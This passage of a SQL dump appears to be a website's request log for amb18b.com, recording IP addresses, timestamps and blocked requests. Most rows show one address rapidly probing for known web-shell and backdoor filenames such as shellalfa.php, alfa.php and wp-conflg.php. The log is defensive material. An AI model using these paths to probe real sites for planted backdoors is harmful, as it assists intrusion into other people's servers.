Access',3,'2025-10-26 01:12:05','2025-10-26 01:11:54'),(1305,'https://amb18b.com/app/','34.1.29.134','Direct Access',4,'2025-10-26 01:45:56','2025-10-26 01:45:37'),(1306,'https://amb18b.com/login/','34.1.29.134','Direct Access',4,'2025-10-26 01:45:58','2025-10-26 01:45:39'),(1307,'https://amb18b.com/app/','34.1.24.127','Direct Access',4,'2025-10-26 02:59:52','2025-10-26 02:59:33'),(1308,'https://amb18b.com/login/','34.1.24.127','Direct Access',4,'2025-10-26 02:59:54','2025-10-26 02:59:35'),(1309,'https://amb18b.com/app/','34.1.21.131','Direct Access',4,'2025-10-26 03:02:55','2025-10-26 03:02:33'),(1310,'https://amb18b.com/login/','34.1.21.131','Direct Access',4,'2025-10-26 03:02:57','2025-10-26 03:02:35'),(1311,'https://amb18b.com/app/','34.1.26.71','Direct Access',4,'2025-10-26 03:05:10','2025-10-26 03:04:51'),(1312,'https://amb18b.com/login/','34.1.26.71','Direct Access',4,'2025-10-26 03:05:12','2025-10-26 03:04:53'),(1313,'https://amb18b.com/app/','34.1.19.215','Direct Access',4,'2025-10-26 03:16:30','2025-10-26 03:16:09'),(1314,'https://amb18b.com/login/','34.1.19.215','Direct Access',4,'2025-10-26 03:16:32','2025-10-26 03:16:11'),(1315,'https://amb18b.com/app/','34.1.30.124','Direct Access',2,'2025-10-26 04:11:25','2025-10-26 04:11:19'),(1316,'https://amb18b.com/login/','34.1.30.124','Direct Access',2,'2025-10-26 04:11:27','2025-10-26 04:11:21'),(1317,'https://amb18b.com/error.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:21','2025-10-26 04:41:21'),(1318,'https://amb18b.com/wpo.php','172.192.51.163','Direct Access',2,'2025-10-26 04:42:30','2025-10-26 04:41:22'),(1319,'https://amb18b.com/shellalfa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:23','2025-10-26 04:41:23'),(1320,'https://amb18b.com/owl.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:24','2025-10-26 04:41:24'),(1321,'https://amb18b.com/php8.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:26','2025-10-26 04:41:26'),(1322,'https://amb18b.com/wp-admin/maint/index.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:27','2025-10-26 04:41:27'),(1323,'https://amb18b.com/n.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:28','2025-10-26 04:41:28'),(1324,'https://amb18b.com/s.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:30','2025-10-26 04:41:30'),(1325,'https://amb18b.com/cong.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 04:41:32','2025-10-26 04:41:32'),(1326,'https://amb18b.com/wp-includes/fonts/about.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:34','2025-10-26 04:41:34'),(1327,'https://amb18b.com/css.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:36','2025-10-26 04:41:36'),(1328,'https://amb18b.com/lv.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:37','2025-10-26 04:41:37'),(1329,'https://amb18b.com/ee.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:38','2025-10-26 04:41:38'),(1330,'https://amb18b.com/6.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:40','2025-10-26 04:41:40'),(1331,'https://amb18b.com/system_log.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:41','2025-10-26 04:41:41'),(1332,'https://amb18b.com/ab.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:43','2025-10-26 04:41:43'),(1333,'https://amb18b.com/lock360.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:44','2025-10-26 04:41:44'),(1334,'https://amb18b.com/about.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:45','2025-10-26 04:41:45'),(1335,'https://amb18b.com/222.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:47','2025-10-26 04:41:47'),(1336,'https://amb18b.com/abcd.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:48','2025-10-26 04:41:48'),(1337,'https://amb18b.com/gifclass.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:49','2025-10-26 04:41:49'),(1338,'https://amb18b.com/enclas.php','172.192.51.163','Direct Access',2,'2025-10-26 04:42:33','2025-10-26 04:41:51'),(1339,'https://amb18b.com/alfa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:52','2025-10-26 04:41:52'),(1340,'https://amb18b.com/we.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:53','2025-10-26 04:41:53'),(1341,'https://amb18b.com/fe5.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:54','2025-10-26 04:41:54'),(1342,'https://amb18b.com/tgrs.php','172.192.51.163','Direct Access',2,'2025-10-26 04:42:17','2025-10-26 04:41:55'),(1343,'https://amb18b.com/ut.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:57','2025-10-26 04:41:57'),(1344,'https://amb18b.com/a3.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:58','2025-10-26 04:41:58'),(1345,'https://amb18b.com/aa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:41:59','2025-10-26 04:41:59'),(1346,'https://amb18b.com/.well-known/acme-challenge/about.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:01','2025-10-26 04:42:01'),(1347,'https://amb18b.com/3.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:02','2025-10-26 04:42:02'),(1348,'https://amb18b.com/f6.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:03','2025-10-26 04:42:03'),(1349,'https://amb18b.com/fm.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:04','2025-10-26 04:42:04'),(1350,'https://amb18b.com/rrr.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:06','2025-10-26 04:42:06'),(1351,'https://amb18b.com/usep.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:07','2025-10-26 04:42:07'),(1352,'https://amb18b.com/fm.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 04:42:08','2025-10-26 04:42:08'),(1353,'https://amb18b.com/0x.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:10','2025-10-26 04:42:10'),(1354,'https://amb18b.com/goat.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:11','2025-10-26 04:42:11'),(1355,'https://amb18b.com/123.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:13','2025-10-26 04:42:13'),(1356,'https://amb18b.com/ioxi-o.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:14','2025-10-26 04:42:14'),(1357,'https://amb18b.com/taktak.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:15','2025-10-26 04:42:15'),(1358,'https://amb18b.com/gt.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:18','2025-10-26 04:42:18'),(1359,'https://amb18b.com/aghbvr.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:20','2025-10-26 04:42:20'),(1360,'https://amb18b.com/miso.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:21','2025-10-26 04:42:21'),(1361,'https://amb18b.com/naxc.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:22','2025-10-26 04:42:22'),(1362,'https://amb18b.com/fex.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:23','2025-10-26 04:42:23'),(1363,'https://amb18b.com/taff.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:25','2025-10-26 04:42:25'),(1364,'https://amb18b.com/bless11.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:26','2025-10-26 04:42:26'),(1365,'https://amb18b.com/aj.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:27','2025-10-26 04:42:27'),(1366,'https://amb18b.com/opts.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:29','2025-10-26 04:42:29'),(1367,'https://amb18b.com/filer.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:32','2025-10-26 04:42:32'),(1368,'https://amb18b.com/en0.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:35','2025-10-26 04:42:35'),(1369,'https://amb18b.com/kaza.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:36','2025-10-26 04:42:36'),(1370,'https://amb18b.com/wsd.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:38','2025-10-26 04:42:38'),(1371,'https://amb18b.com/gifclass4.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:39','2025-10-26 04:42:39'),(1372,'https://amb18b.com/info.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:41','2025-10-26 04:42:41'),(1373,'https://amb18b.com/333.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:42','2025-10-26 04:42:42'),(1374,'https://amb18b.com/cfile.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:44','2025-10-26 04:42:44'),(1375,'https://amb18b.com/bless3.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:46','2025-10-26 04:42:46'),(1376,'https://amb18b.com/bless.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:47','2025-10-26 04:42:47'),(1377,'https://amb18b.com/doti.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:49','2025-10-26 04:42:49'),(1378,'https://amb18b.com/031.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:50','2025-10-26 04:42:50'),(1379,'https://amb18b.com/wfile.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:51','2025-10-26 04:42:51'),(1380,'https://amb18b.com/lala.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:53','2025-10-26 04:42:53'),(1381,'https://amb18b.com/gmo.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:54','2025-10-26 04:42:54'),(1382,'https://amb18b.com/he.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:55','2025-10-26 04:42:55'),(1383,'https://amb18b.com/plss3.php','172.192.51.163','Direct Access',1,'2025-10-26 04:42:59','2025-10-26 04:42:59'),(1384,'https://amb18b.com/ton.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:00','2025-10-26 04:43:00'),(1385,'https://amb18b.com/33.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:02','2025-10-26 04:43:02'),(1386,'https://amb18b.com/nfile.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:04','2025-10-26 04:43:04'),(1387,'https://amb18b.com/ffile.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:06','2025-10-26 04:43:06'),(1388,'https://amb18b.com/file18.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:08','2025-10-26 04:43:08'),(1389,'https://amb18b.com/file21.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:09','2025-10-26 04:43:09'),(1390,'https://amb18b.com/yellow.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:11','2025-10-26 04:43:11'),(1391,'https://amb18b.com/file1.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:13','2025-10-26 04:43:13'),(1392,'https://amb18b.com/geck.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:17','2025-10-26 04:43:17'),(1393,'https://amb18b.com/file4.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:19','2025-10-26 04:43:19'),(1394,'https://amb18b.com/file88.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:21','2025-10-26 04:43:21'),(1395,'https://amb18b.com/7.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:22','2025-10-26 04:43:22'),(1396,'https://amb18b.com/size.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:24','2025-10-26 04:43:24'),(1397,'https://amb18b.com/bolt.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:26','2025-10-26 04:43:26'),(1398,'https://amb18b.com/file8.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:27','2025-10-26 04:43:27'),(1399,'https://amb18b.com/file2.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:28','2025-10-26 04:43:28'),(1400,'https://amb18b.com/vee.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:30','2025-10-26 04:43:30'),(1401,'https://amb18b.com/a2.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:31','2025-10-26 04:43:31'),(1402,'https://amb18b.com/xxa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:32','2025-10-26 04:43:32'),(1403,'https://amb18b.com/mlex.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:34','2025-10-26 04:43:34'),(1404,'https://amb18b.com/030.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:36','2025-10-26 04:43:36'),(1405,'https://amb18b.com/haa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:37','2025-10-26 04:43:37'),(1406,'https://amb18b.com/xsox.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:39','2025-10-26 04:43:39'),(1407,'https://amb18b.com/classgoto24.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:40','2025-10-26 04:43:40'),(1408,'https://amb18b.com/inde.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:42','2025-10-26 04:43:42'),(1409,'https://amb18b.com/akk.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:43','2025-10-26 04:43:43'),(1410,'https://amb18b.com/alpa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:45','2025-10-26 04:43:45'),(1411,'https://amb18b.com/finny.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:46','2025-10-26 04:43:46'),(1412,'https://amb18b.com/file15.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:47','2025-10-26 04:43:47'),(1413,'https://amb18b.com/0x0x.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:49','2025-10-26 04:43:49'),(1414,'https://amb18b.com/2clas.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:54','2025-10-26 04:43:54'),(1415,'https://amb18b.com/file9.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:55','2025-10-26 04:43:55'),(1416,'https://amb18b.com/aaa.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:56','2025-10-26 04:43:56'),(1417,'https://amb18b.com/ilex.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:58','2025-10-26 04:43:58'),(1418,'https://amb18b.com/tor.php','172.192.51.163','Direct Access',1,'2025-10-26 04:43:59','2025-10-26 04:43:59'),(1419,'https://amb18b.com/klex.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:00','2025-10-26 04:44:00'),(1420,'https://amb18b.com/shell1.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:01','2025-10-26 04:44:01'),(1421,'https://amb18b.com/sec.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:03','2025-10-26 04:44:03'),(1422,'https://amb18b.com/filesss.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:04','2025-10-26 04:44:04'),(1423,'https://amb18b.com/ea.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:06','2025-10-26 04:44:06'),(1424,'https://amb18b.com/gi.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:11','2025-10-26 04:44:11'),(1425,'https://amb18b.com/10.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:12','2025-10-26 04:44:12'),(1426,'https://amb18b.com/11.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:14','2025-10-26 04:44:14'),(1427,'https://amb18b.com/12.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:15','2025-10-26 04:44:15'),(1428,'https://amb18b.com/13.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:19','2025-10-26 04:44:19'),(1429,'https://amb18b.com/hi.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:20','2025-10-26 04:44:20'),(1430,'https://amb18b.com/v.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:22','2025-10-26 04:44:22'),(1431,'https://amb18b.com/ar.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:23','2025-10-26 04:44:23'),(1432,'https://amb18b.com/chosen.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:24','2025-10-26 04:44:24'),(1433,'https://amb18b.com/article.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:26','2025-10-26 04:44:26'),(1434,'https://amb18b.com/install.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:27','2025-10-26 04:44:27'),(1435,'https://amb18b.com/max.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:28','2025-10-26 04:44:28'),(1436,'https://amb18b.com/1.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:29','2025-10-26 04:44:29'),(1437,'https://amb18b.com/bak.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:31','2025-10-26 04:44:31'),(1438,'https://amb18b.com/ini.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:32','2025-10-26 04:44:32'),(1439,'https://amb18b.com/mail.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:33','2025-10-26 04:44:33'),(1440,'https://amb18b.com/dlu.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:35','2025-10-26 04:44:35'),(1441,'https://amb18b.com/zde.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:36','2025-10-26 04:44:36'),(1442,'https://amb18b.com/ifm.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:38','2025-10-26 04:44:38'),(1443,'https://amb18b.com/redi.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:39','2025-10-26 04:44:39'),(1444,'https://amb18b.com/fns.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:40','2025-10-26 04:44:40'),(1445,'https://amb18b.com/pent.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:41','2025-10-26 04:44:41'),(1446,'https://amb18b.com/wsx.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:43','2025-10-26 04:44:43'),(1447,'https://amb18b.com/r79.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:44','2025-10-26 04:44:44'),(1448,'https://amb18b.com/mpxct.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:45','2025-10-26 04:44:45'),(1449,'https://amb18b.com/x3.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:47','2025-10-26 04:44:47'),(1450,'https://amb18b.com/wan.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:48','2025-10-26 04:44:48'),(1451,'https://amb18b.com/iov.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:50','2025-10-26 04:44:50'),(1452,'https://amb18b.com/RsR.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:51','2025-10-26 04:44:51'),(1453,'https://amb18b.com/ouh.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:52','2025-10-26 04:44:52'),(1454,'https://amb18b.com/133.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:54','2025-10-26 04:44:54'),(1455,'https://amb18b.com/x0.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:56','2025-10-26 04:44:56'),(1456,'https://amb18b.com/wsr2.php','172.192.51.163','Direct Access',1,'2025-10-26 04:44:57','2025-10-26 04:44:57'),(1457,'https://amb18b.com/app/','34.1.16.155','Direct Access',1,'2025-10-26 05:03:56','2025-10-26 05:03:56'),(1458,'https://amb18b.com/login/','34.1.16.155','Direct Access',1,'2025-10-26 05:03:58','2025-10-26 05:03:58'),(1459,'https://amb18b.com/wp-plain.php','20.41.74.116','Invalid Referrer',1,'2025-10-26 06:56:57','2025-10-26 06:56:57'),(1460,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','20.41.74.116','Invalid Referrer',1,'2025-10-26 06:56:57','2025-10-26 06:56:57'),(1461,'https://amb18b.com/','20.41.74.116','Invalid Referrer',2,'2025-10-26 06:56:59','2025-10-26 06:56:58'),(1462,'https://amb18b.com/alfacgiapi/perl.alfa','20.41.74.116','Invalid Referrer',1,'2025-10-26 06:57:00','2025-10-26 06:57:00'),(1463,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','20.41.74.116','Direct Access',1,'2025-10-26 06:57:02','2025-10-26 06:57:02'),(1464,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','20.41.74.116','Direct Access',1,'2025-10-26 06:57:05','2025-10-26 06:57:05'),(1465,'https://amb18b.com/.well-known/security.txt','147.185.132.61','Direct Access',1,'2025-10-26 07:25:24','2025-10-26 07:25:24'),(1466,'https://amb18b.com//wp-includes/ID3/license.txt','85.204.70.118','Direct Access',2,'2025-10-26 07:43:48','2025-10-26 07:43:48'),(1467,'https://amb18b.com/?author=2','85.204.70.118','Direct Access',2,'2025-10-26 07:43:51','2025-10-26 07:43:51'),(1468,'https://amb18b.com/wp-plain.php','172.192.33.232','Invalid Referrer',1,'2025-10-26 08:31:09','2025-10-26 08:31:09'),(1469,'https://amb18b.com/ALFA_DATA/alfacgiapi/perl.alfa','172.192.33.232','Invalid Referrer',1,'2025-10-26 08:31:09','2025-10-26 08:31:09'),(1470,'https://amb18b.com/','172.192.33.232','Invalid Referrer',2,'2025-10-26 08:31:10','2025-10-26 08:31:10'),(1471,'https://amb18b.com/alfacgiapi/perl.alfa','172.192.33.232','Invalid Referrer',1,'2025-10-26 08:31:11','2025-10-26 08:31:11'),(1472,'https://amb18b.com/plugins/content/apismtp/apismtp.php?test=hello','172.192.33.232','Direct Access',1,'2025-10-26 08:31:14','2025-10-26 08:31:14'),(1473,'https://amb18b.com/plugins/content/apismtp/apismtp.php.suspected?test=hello','172.192.33.232','Direct Access',1,'2025-10-26 08:31:17','2025-10-26 08:31:17'),(1474,'https://amb18b.com/atomlib.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:46','2025-10-26 11:41:46'),(1475,'https://amb18b.com/a.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:48','2025-10-26 11:41:48'),(1476,'https://amb18b.com/v.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:51','2025-10-26 11:41:51'),(1477,'https://amb18b.com/d2.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:53','2025-10-26 11:41:53'),(1478,'https://amb18b.com/xc.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:55','2025-10-26 11:41:55'),(1479,'https://amb18b.com/g.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:57','2025-10-26 11:41:57'),(1480,'https://amb18b.com/gmo.php','172.192.51.163','Direct Access',1,'2025-10-26 11:41:58','2025-10-26 11:41:58'),(1481,'https://amb18b.com/11.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:00','2025-10-26 11:42:00'),(1482,'https://amb18b.com/20.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:01','2025-10-26 11:42:01'),(1483,'https://amb18b.com/f35.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:03','2025-10-26 11:42:03'),(1484,'https://amb18b.com/1.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:04','2025-10-26 11:42:04'),(1485,'https://amb18b.com/c.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:06','2025-10-26 11:42:06'),(1486,'https://amb18b.com/build.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:08','2025-10-26 11:42:08'),(1487,'https://amb18b.com/bless.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:09','2025-10-26 11:42:09'),(1488,'https://amb18b.com/admin/upload/css.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:10','2025-10-26 11:42:10'),(1489,'https://amb18b.com/lock360.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:12','2025-10-26 11:42:12'),(1490,'https://amb18b.com/4.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:42:14','2025-10-26 11:42:14'),(1491,'https://amb18b.com/about.php','172.192.51.163','Direct Access',2,'2025-10-26 11:43:39','2025-10-26 11:42:15'),(1492,'https://amb18b.com/r.php','172.192.51.163','Direct Access',2,'2025-10-26 11:42:50','2025-10-26 11:42:16'),(1493,'https://amb18b.com/v4.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:18','2025-10-26 11:42:18'),(1494,'https://amb18b.com/wp-22.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:20','2025-10-26 11:42:20'),(1495,'https://amb18b.com/makeasmtp.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:42:21','2025-10-26 11:42:21'),(1496,'https://amb18b.com/system_log.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:23','2025-10-26 11:42:23'),(1497,'https://amb18b.com/NewFile.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:25','2025-10-26 11:42:25'),(1498,'https://amb18b.com/t.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:42:27','2025-10-26 11:42:27'),(1499,'https://amb18b.com/ee.php','172.192.51.163','Direct Access',2,'2025-10-26 11:42:52','2025-10-26 11:42:29'),(1500,'https://amb18b.com/2.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:31','2025-10-26 11:42:31'),(1501,'https://amb18b.com//gmo.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:34','2025-10-26 11:42:34'),(1502,'https://amb18b.com/6.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:36','2025-10-26 11:42:36'),(1503,'https://amb18b.com/12.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:37','2025-10-26 11:42:37'),(1504,'https://amb18b.com/0.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:39','2025-10-26 11:42:39'),(1505,'https://amb18b.com/wp-admin/css/wp-conflg.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:42:40','2025-10-26 11:42:40'),(1506,'https://amb18b.com/wp-includes/js/codemirror/index.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:41','2025-10-26 11:42:41'),(1507,'https://amb18b.com/02.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:43','2025-10-26 11:42:43'),(1508,'https://amb18b.com/w.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:44','2025-10-26 11:42:44'),(1509,'https://amb18b.com/go.php?p=','172.192.51.163','Direct Access',1,'2025-10-26 11:42:46','2025-10-26 11:42:46'),(1510,'https://amb18b.com/public_html','172.192.51.163','Direct Access',1,'2025-10-26 11:42:48','2025-10-26 11:42:48'),(1511,'https://amb18b.com/an.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:54','2025-10-26 11:42:54'),(1512,'https://amb18b.com/wp.php','172.192.51.163','Direct Access',1,'2025-10-26 11:42:56','2025-10-26 11:42:56'),(1513,'https://amb18b.com/admin.php','172.192.51.163','Direct Access',2,'2025-10-26 11:43:04','2025-10-26 11:43:02'),(1514,'https://amb18b.com/wp-includes/Text/Diff/Engine/about.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:06','2025-10-26 11:43:06'),(1515,'https://amb18b.com/index/function.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:08','2025-10-26 11:43:08'),(1516,'https://amb18b.com/wp-includes/ID3/rk2.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:09','2025-10-26 11:43:09'),(1517,'https://amb18b.com/license.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:11','2025-10-26 11:43:11'),(1518,'https://amb18b.com/radio.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:13','2025-10-26 11:43:13'),(1519,'https://amb18b.com/info.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:14','2025-10-26 11:43:14'),(1520,'https://amb18b.com/alfanew.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:15','2025-10-26 11:43:15'),(1521,'https://amb18b.com/inputs.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:17','2025-10-26 11:43:17'),(1522,'https://amb18b.com/admin/function.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:19','2025-10-26 11:43:19'),(1523,'https://amb18b.com/wp-includes/assets/index.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:20','2025-10-26 11:43:20'),(1524,'https://amb18b.com/wp-admin/images/index.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:22','2025-10-26 11:43:22'),(1525,'https://amb18b.com/default.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:24','2025-10-26 11:43:24'),(1526,'https://amb18b.com/lv.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:25','2025-10-26 11:43:25'),(1527,'https://amb18b.com/marijuana.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:28','2025-10-26 11:43:28'),(1528,'https://amb18b.com/wp-includes/autoload_classmap.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:30','2025-10-26 11:43:30'),(1529,'https://amb18b.com/css/colors/coffee/index.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:34','2025-10-26 11:43:34'),(1530,'https://amb18b.com/css.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:35','2025-10-26 11:43:35'),(1531,'https://amb18b.com/1.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:42','2025-10-26 11:43:42'),(1532,'https://amb18b.com/marijuana.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:44','2025-10-26 11:43:44'),(1533,'https://amb18b.com/about/function.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:47','2025-10-26 11:43:47'),(1534,'https://amb18b.com/simple.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:48','2025-10-26 11:43:48'),(1535,'https://amb18b.com/goat1.php','172.192.51.163','Direct Access',1,'2025-10-26 11:43:50','2025-10-26 11:43:50'),(1536,'https://amb18b.com/chosen.php?','172.192.51.163','Direct Access',1,'2025-10-26 11:43:52','2025-10-26 